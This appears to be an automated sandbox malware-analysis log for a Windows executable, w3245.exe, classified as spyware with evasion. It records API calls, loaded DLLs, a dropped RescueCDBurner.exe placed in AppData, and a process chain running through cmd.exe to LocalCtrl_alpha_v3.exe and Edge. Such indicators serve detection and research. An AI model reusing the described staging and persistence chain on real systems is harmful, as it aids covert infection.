Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: String function: 00A40726 appears 34 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: String function: 00A432F3 appears 83 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: String function: 00A01F13 appears 54 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: String function: 00A03821 appears 501 times
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: String function: 00A40237 appears 683 times
Source: LocalCtrl_alpha_v3.exe.4.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
Source: lshbkgxootar.12.drStatic PE information: Number of sections : 12 > 10
Source: xbsvw.4.drStatic PE information: Number of sections : 12 > 10
Source: w3245.exe, 00000000.00000000.1658898497.000000000082D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameconn.exe8 vs w3245.exe
Source: w3245.exe, 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameconn.exe8 vs w3245.exe
Source: w3245.exe, 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameSQLUNIRL.DLLJ vs w3245.exe
Source: w3245.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engineClassification label: mal80.spyw.evad.winEXE@72/347@23/13
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007FFE21 FormatMessageW,GetLastError,LocalFree,0_2_007FFE21
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C45EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,0_2_007C45EE
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A045EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,1_2_00A045EE
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: _CreateService_@52,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CreateServiceA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,1_2_5BB42A14
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0080304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_0080304F
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB37CC0 _FindResource@12,FindResourceW,newMultiByteFromWideChar,newMultiByteFromWideChar,FindResourceA,GlobalFree,GlobalFree,1_2_5BB37CC0
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007E6B88 ChangeServiceConfigW,GetLastError,0_2_007E6B88
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB439D2 _StartServiceCtrlDispatcher_@4,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,StartServiceCtrlDispatcherA,MultiByteToWideChar,GlobalFree,GlobalFree,1_2_5BB439D2
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManageJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
Source: C:\Users\user\Desktop\w3245.exeFile created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\Jump to behavior
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: cabinet.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: msi.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: version.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: wininet.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: comres.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: clbcatq.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: msasn1.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: crypt32.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: feclient.dll0_2_007C1070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: cabinet.dll0_2_007C1070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: cabinet.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: msi.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: version.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: wininet.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: comres.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: clbcatq.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: msasn1.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: crypt32.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: feclient.dll1_2_00A01070
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCommand line argument: cabinet.dll1_2_00A01070
Source: w3245.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\w3245.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: w3245.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: w3245.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\w3245.exeFile read: C:\Users\user\Desktop\w3245.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\w3245.exe "C:\Users\user\Desktop\w3245.exe"
Source: C:\Users\user\Desktop\w3245.exeProcess created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe "C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeProcess created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1984,i,12396277131636632407,2205267590406277603,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6512 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1992,i,12794935825972523689,1062421692314691261,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1984,i,5351310162108678119,10159255576747894809,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6644 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Users\user\Desktop\w3245.exeProcess created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe "C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=540 -burn.filehandle.self=528 Jump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeProcess created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1984,i,12396277131636632407,2205267590406277603,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6512 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7392 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6644 --field-trial-handle=2100,i,8124238674860067162,5806231028758839583,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1992,i,12794935825972523689,1062421692314691261,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1984,i,5351310162108678119,10159255576747894809,262144 /prefetch:3
Source: C:\Users\user\Desktop\w3245.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: feclient.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
